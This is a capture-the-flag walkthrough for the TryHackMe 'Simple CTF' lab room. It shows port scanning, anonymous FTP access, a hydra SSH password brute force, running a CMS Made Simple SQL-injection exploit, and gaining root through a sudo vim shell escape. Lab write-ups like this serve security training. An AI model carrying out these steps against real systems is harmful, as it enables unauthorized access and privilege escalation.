SimpleCTF Walkthrough

You can find the link here : https://tryhackme.com/room/easyctf

ctf

So let us begin the challenge :)

As always we need to enumerate the machine for open ports and find vulnerabilities in them so that we can exploit them and get access to the machine.

We can use a tool called Nmap for that. I have made a blog about Nmap which you can check here.

[aksheet@archlinux THM]$ nmap -sV -T4 IPStarting Nmap 7.91 ( https://nmap.org ) at 2021-08-04 16:46 UTC
Nmap scan report for IP
Host is up (0.16s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.95 seconds

As we can see there are 3 ports open 21, 80 and 2222 running. Nmap also tells us that the OS running in it is Ubuntu.

This Nmap scan reveals the answer for the first 2 tasks.

FootHold Technique 1

Now it is the time for enumerating these services. First let us check out the FTP service which is running on port 21. (I like going enumerate the ports in order).

The first thing I would try is if the ftp server will allow anonymous connection. Let us try that.

ftp IP and for the username enter anonymous

[aksheet@archlinux THM]$ ftp IPConnected to IP.
220 (vsFTPd 3.0.3)
Name (IP:aksheet): anonymous <- Enter this as the username
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Yes, anonymous login is enabled. Lets us try viewing the files in it with the ls -la command.

ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Aug 17 2019 .
drwxr-xr-x 3 ftp ftp 4096 Aug 17 2019 ..
drwxr-xr-x 2 ftp ftp 4096 Aug 17 2019 pub
226 Directory send OK.
ftp>

There is a folder called as pub . Let us change our directory to pub via the cd pub command and view the files inside it with the ls -la command.

ftp> cd pub
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Aug 17 2019 .
drwxr-xr-x 3 ftp ftp 4096 Aug 17 2019 ..
-rw-r--r-- 1 ftp ftp 166 Aug 17 2019 ForMitch.txt
226 Directory send OK.
ftp>

We can see a ForMitch file. We can view the contents for the file via the get ForMitch.txt - command.

ftp> get ForMitch.txt -
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ForMitch.txt (166 bytes).
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!

If you read it, you can see that the text says that the person cracked the password. Does that mean we can use brute force to get the SSH password?

We can use a tool called hydra which will brute force SSH for us. We can see that the user is called Mitch. What if we use that as the username and crack the password for it.

hydra -l Mitch -P /path/to/rockyou.txt ssh://IP:2222

After a few seconds it will show us that it has cracked the password.

[aksheet@archlinux ~]$ hydra -l mitch -P rockyou.txt ssh://10.10.142.56:2222---
[DATA] attacking ssh://10.10.142.56:2222/
[2222][ssh] host: 10.10.142.56 login: mitch password: redacted
1 of 1 target successfully completed, 1 valid password found
---

This bruteforce gives us the answer for task number 5 and 6. (3 and 4 will be covered in the Foothold part 2)

Now we can successfully login via the gained credentials in SSH.

[aksheet@archlinux ~]$ ssh mitch@IP -p2222 
The authenticity of host '[IP]:2222 ([IP]:2222)' can't be established.
ED25519 key fingerprint is SHA256:iq4f0XcnA5nnPNAufEqOpvTbO8dOJPcHGgmeABEdQ5g.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[IP]:2222' (ED25519) to the list of known hosts.
mitch@IP's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
$ whoami
mitch

FootHold Technique 2

Now enumerating the port 80.

Browsing to the default webpage we can see the default apache page

The first thing that came in my mind was directory busting. We can use a tool called dirsearch to do so.

dirsearch -i 403 -u IP -t 200

[16:46:09] Starting: 
[16:46:36] 200 - 11KB - /index.html
[16:46:46] 200 - 929B - /robots.txt
[16:50:49] 301 - 315B - /simple -> http://IP/simple/

We find a directory called simple , let’s browse it.

simple

We see a webpage which is made by CMS as shown on the top. Usually the version numbers are written on the bottom on the page.

Scrolling to the bottom of the page we DO find the version of the page which happens to be the 2.2.8

2.2.8

Now let’s search for a exploit for this specific version.

This first result was the one we needed as it is an exploit for CMS versions less than 2.2.10.

cve

This will answer the task number 3 and task 4

Let’s copy the exploit from the site and save it locally on your attacking machine as any name (I will use the name as ex.py)

python ex.py -u http://IP/simple

After 2 3 minutes we found the password.

$ python2 ex.py -u http://IP/simple --crack -w ~/Desktop/rockyou.txt[+] Salt for password found: Redacted
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: Redacted
[+] Password cracked: Redacted

This answers task number 5.

We can use the username and password to try login in FTP or SSH.

$ ftp IP                                                               
Connected to IP.
220 (vsFTPd 3.0.3)
Name (IP:kali): mitch
530 This FTP server is anonymous only.
Login failed.

So it looks like FTP won’t work. Let’s try SSH.

$ ssh mitch@IP -p2222                                                     
Warning: Permanently added '[IP]:2222' (ECDSA) to the list of known hosts.
mitch@IP's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$

Yes, we could login in SSH via the obtained creds. This answers task number 6.

We can find user.txt in the home directory of the user mitch, we can view it’s contents using cat user.txt.

$ pwd
/home/mitch
$ ls
user.txt
$ cat user.txt
Redacted

This answers our task number 7

To answer the 8th question we have to browse in the /home directory and list the folders in there using ls.

$ cd /home
$ ls
mitch sunbath

As we can see there are 2 users namely mitch and sunbath.

Path To Root

The first thing I do to check for privilege escalation is the sudo rights of the user. You can find out by doing the sudo -l command.

$ sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim

sudo -l shows us that we can run vim as sudo to get root.

This answers the task number 9.

We can go to GTFOBins to see the way to escape vim and get root.

Click on Sudo

Let’s run the first command sudo vim -c ':!/bin/sh'

$ sudo vim -c ':!/bin/sh'# whoami 
root
#

Wohoo!!! We are root. We can get the root flag stored in /root

# cd /root
# ls
root.txt
# cat root.txt
Redacted

This answers the last task

Thank you for reading my writeup. Hope you enjoyed it.

Hi, I’m Aksheet. A young kiddo who is interested in Cyber Security. eJPT certified on 9th March 2021. Tryhackme Account : https://tryhackme.com/p/Aksheet